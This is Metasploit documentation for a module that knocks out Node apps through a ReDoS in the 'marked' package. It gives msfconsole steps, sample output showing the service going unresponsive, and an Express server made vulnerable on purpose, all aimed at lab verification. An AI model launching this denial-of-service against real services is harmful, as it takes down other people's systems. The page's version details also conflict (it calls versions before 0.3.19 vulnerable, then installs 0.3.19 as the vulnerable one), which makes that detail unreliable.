adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/auxiliary/dos/http/marked_redos.md
T
h00die fd8420cef7 fix install lines
2020-03-24 09:36:17 -04:00

2.8 KiB
Raw Blame History

Vulnerable Application

This auxiliary module exploits a Regular Expression Denial of Service vulnerability in the npm module marked. The vulnerable regex is in the "heading" processing. Versions before 0.3.19 are vulnerable. Any application that uses a vulnerable version of this module and passes untrusted input to the module will be vulnerable.

How to Install

To install a vulnerable version of marked, run:

npm i marked@0.3.19

Verification Steps

  1. Create a new directory for test application.
  2. Copy below example server into test application directory as server.js.
  3. Run npm i express to install express in the test application directory.
  4. To test vulnerable versions of the module, run npm i marked@0.3.19 to install a vulnerable version of marked.
  5. To test non-vulnerable versions of the module, run npm i marked to install the latest version of marked.
  6. Once all dependencies are installed, run the server with node server.js.
  7. Open up a new terminal.
  8. Start msfconsole.
  9. use auxiliary/dos/http/marked_redos.
  10. set RHOST [IP].
  11. set HTTP_METHOD get (optional)
  12. set HTTP_PARAMETER foo (required)
  13. set TARGETURI /path/to/vulnerable/route (optional)
  14. run.
  15. In vulnerable installations, Module should have positive output and the test application should accept no further requests.
  16. In non-vulnerable installations, module should have negative output and the test application should accept further requests.

Scenarios

marked npm module version 0.3.19

Expected output for successful exploitation:

[*] Testing Service to make sure it is working.
[*] Test request successful, attempting to send payload
[*] Sending ReDoS request to 192.168.3.24:3000.
[*] No response received from 192.168.3.24:3000, service is most likely unresponsive.
[*] Testing for service unresponsiveness.
[+] Service not responding.
[*] Auxiliary module execution completed

Example Vulnerable Application

// npm i express body-parser
// npm i marked@0.3.19 (vulnerable)
// npm i marked (non-vulnerable)

const marked = require('marked');
const express = require('express');
const bodyParser = require('body-parser');

var app = express();
app.use(bodyParser.text({ type: 'text/html' }));

// create application/json parser
const jsonParser = bodyParser.json();

// create application/x-www-form-urlencoded parser
const urlencodedParser = bodyParser.urlencoded({ extended: false });

app.get("/", urlencodedParser, function(req, res) {
  var result = req.query.foo ? marked(req.query.foo) : 'nothing';
  res.end(result);
});

app.post("/cat", urlencodedParser, function(req, res) {
  var result = req.body.bar ? marked(req.body.bar) : 'nothing'
  res.end(result);
});

app.listen(3000, '0.0.0.0', function() { console.log('Application listening on port 3000 on all interfaces!'); });
Reference in New Issue View Git Blame Copy Permalink